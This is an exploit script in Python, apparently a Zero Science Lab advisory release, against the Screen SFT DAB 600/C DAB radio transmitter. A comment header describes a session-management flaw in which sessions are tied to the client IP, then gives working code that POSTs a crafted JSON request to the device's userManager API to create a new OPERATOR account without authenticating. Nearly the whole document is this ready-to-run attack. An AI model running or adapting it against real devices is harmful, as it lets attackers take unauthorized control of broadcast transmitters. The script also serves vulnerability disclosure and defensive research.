Screen SFT DAB 600/C Authentication Bypass / Account Creation

`#!/usr/bin/env python3  
#  
#  
# Screen SFT DAB 600/C Authentication Bypass Account Creation Exploit  
#  
#  
# Vendor: DB Elettronica Telecomunicazioni SpA  
# Product web page: https://www.screen.it | https://www.dbbroadcast.com  
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/  
# Affected version: Firmware: 1.9.3  
# Bios firmware: 7.1 (Apr 19 2021)  
# Gui: 2.46  
# FPGA: 169.55  
# uc: 6.15  
#  
# Summary: Screen's new radio DAB Transmitter is reaching the highest  
# technology level in both Digital Signal Processing and RF domain.  
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the  
# digital adaptive precorrection and configuatio flexibility, the Hot  
# Swap System technology, the compactness and the smart system design,  
# the SFT DAB are advanced transmitters. They support standards DAB,  
# DAB+ and T-DMB and are compatible with major headend brands.  
#  
# Desc: The application suffers from a weak session management that can  
# allow an attacker on the same network to bypass these controls by reusing  
# the same IP address assigned to the victim user (NAT) and exploit crucial  
# operations on the device itself. By abusing the IP address property that  
# is binded to the Session ID, one needs to await for such an established  
# session and issue unauthorized requests to the vulnerable API to manage  
# and/or manipulate the affected transmitter.  
#  
# Tested on: Keil-EWEB/2.1  
# MontaVista® Linux® Carrier Grade eXpress (CGX)  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2023-5771  
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5771.php  
#  
#  
# 19.03.2023  
#  
  
import hashlib,datetime##########  
import requests,colorama#########  
from colorama import Fore, Style#  
colorama.init()  
print(Fore.RED+Style.BRIGHT+  
'''  
██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████   
██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██   
██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████   
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██   
██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██   
'''  
+Style.RESET_ALL)  
print(Fore.WHITE+Style.BRIGHT+  
'''  
ZSL and the Producers insist that no one  
submit any exploits of themselfs or others  
performing any dangerous activities.  
We will not open or view them.  
'''  
+Style.RESET_ALL)  
s=datetime.datetime.now()  
s=s.strftime('%d.%m.%Y %H:%M:%S')  
print('Starting API XPL -',s)  
t=input('Enter transmitter ip: ')  
u=input('Enter desired username: ')  
p=input('Enter desired password: ')  
e='/system/api/userManager.cgx'  
m5=hashlib.md5()  
m5.update(p.encode('utf-8'))  
h=m5.hexdigest()  
print('Your sig:',h)  
print('Calling object: ssbtObj')  
print('CGX fastcall: userManager::newUser')  
t='http://'+t+e  
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',  
'Accept':'application/json, text/plain, */*',  
'Accept-Language':'ku-MK,en;q=0.9',  
'Accept-Encoding':'gzip, deflate',  
'User-Agent':'Dabber++',  
'Connection':'close'}  
j={'ssbtIdx':0,  
'ssbtType':'userManager',  
'ssbtObj':{  
'newUser':{  
'password':h,  
'type':'OPERATOR',  
'username':u  
}  
},  
}  
r=requests.post(t,headers=bh,json=j)  
if r.status_code==200:  
print('Done.')  
else:  
print('Error')  
exit(-5)  
`